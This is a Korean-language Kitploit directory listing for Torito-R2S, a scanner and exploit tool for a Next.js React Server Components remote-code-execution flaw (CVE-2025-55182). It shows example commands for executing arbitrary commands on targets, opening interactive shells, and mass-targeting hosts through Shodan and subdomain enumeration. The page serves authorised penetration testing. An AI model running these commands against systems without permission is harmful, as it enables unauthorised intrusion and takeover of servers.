Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Torito-R2S — Torito React2Shell 스캐너 및 익스플로잇 도구 (CVE-2025-55182 / 66478) | Kitploit
도구/GitHubGitHub/toritoio/torito-r2s
ReconnaissanceVulnerability ScannersExploitationWeb Application ExploitationPenetration TestingCommand and ControlSubdomain Enumeration
GitHubtoritoio/torito-r2s

Torito-R2S

Torito React2Shell 스캐너 및 익스플로잇 도구 (CVE-2025-55182 / 66478)

저장소 보기
418개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
웹사이트

Torito React2Shell 스캐너 및 익스플로잇 도구 (CVE-2025-55182 / 66478)

Torito Logo

Next.js RSC 대상을 위한 탐지 우선 스캐너로, 선택적 PoC 확인 및 익스플로잇/셸 모드를 제공합니다. 테스트 권한이 있는 시스템에서만 사용하세요.

Requirements

  • Python 3.9+
  • pip install -r requirements.txt
  • --subfinder를 위한 PATH 내 Subfinder 바이너리 (Homebrew brew install subfinder 또는 Go: go install github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest로 설치; 프로젝트: https://github.com/projectdiscovery/subfinder)
  • Shodan 사용에는 pip install shodan이 필요하며(이미 requirements에 포함됨) 그리고 키: export SHODAN_API_KEY=... 및 사용 가능한 쿼리 크레딧이 필요합니다.

Usage

root@kitploit:~
python3 torito_r2s.py --help

Flags

Examples

안전한 프로브 (단일 대상)

root@kitploit:~
python3 torito_r2s.py -u https://target.com

PoC 확인 (사이드 채널 리디렉션)

root@kitploit:~
python3 torito_r2s.py -u https://target.com --confirm

사용자 지정 명령어로 익스플로잇

root@kitploit:~
python3 torito_r2s.py -u https://target.com --exploit-cmd "whoami"

첫 번째 적중 시 대화형 셸

root@kitploit:~
python3 torito_r2s.py -u https://target.com --shell

내보내기로 목록 스캔

root@kitploit:~
python3 torito_r2s.py -l hosts.txt -t 40 --confirm --json-out results.json --csv-out results.csv

Shodan 전용 (키와 크레딧 필요)

root@kitploit:~
export SHODAN_API_KEY=your_key
python3 torito_r2s.py --shodan 'http.title:"Next.js"' --shodan-limit 50 --confirm

Subfinder 전용

root@kitploit:~
python3 torito_r2s.py --subfinder target.com --confirm

프록시 (Burp/Caido)

root@kitploit:~
python3 torito_r2s.py -u https://target.com --proxy http://127.0.0.1:8080 --confirm

stdin을 통한 파이프라인

root@kitploit:~
cat urls.txt | python3 torito_r2s.py --confirm

Output notes

  • 테이블은 지문(NX/AR), 프로브, 확인, 익스플로잇을 표시합니다.
  • 익스플로잇 다이제스트는 가능한 경우 base64 디코딩되며, 상세 모드에서는 미리보기를 표시합니다.
  • JSON/CSV에는 원시 다이제스트와 디코딩된 출력(있는 경우)이 포함됩니다.

Safety

  • 승인된 테스트 전용입니다.
  • 기본 실행은 비파괴 프로브이며, 익스플로잇은 --exploit-cmd 또는 --shell이 있을 때만 실행됩니다.
도구 다운로드
FlagDescriptionDefault
-u, --url URL단일 대상 URL—
-l, --list FILE대상이 포함된 파일 (한 줄에 하나씩)—
--subfinder DOMAIN도메인에 대해 subfinder 실행 후 결과 추가—
--shodan QUERYShodan 검색 (SHODAN_API_KEY와 크레딧 필요)—
--shodan-limit N쿼리당 최대 Shodan 결과 수100
-t, --threads N동시 실행 수20
--timeout SEC요청 타임아웃10
--proxy URLHTTP/HTTPS 프록시—
--confirm프로브 후 리디렉션 기반 PoC 실행off
--exploit-cmd "CMD"명령어로 RCE 페이로드 실행—
--shell, -i첫 번째 익스플로잇 성공 시 대화형 셸 열기 (기본 명령어는 id)off
--json-out FILEJSON 결과 저장—
--csv-out FILECSV 결과 저장—
-v, --verbose디코딩된 출력/다이제스트를 테이블에 표시off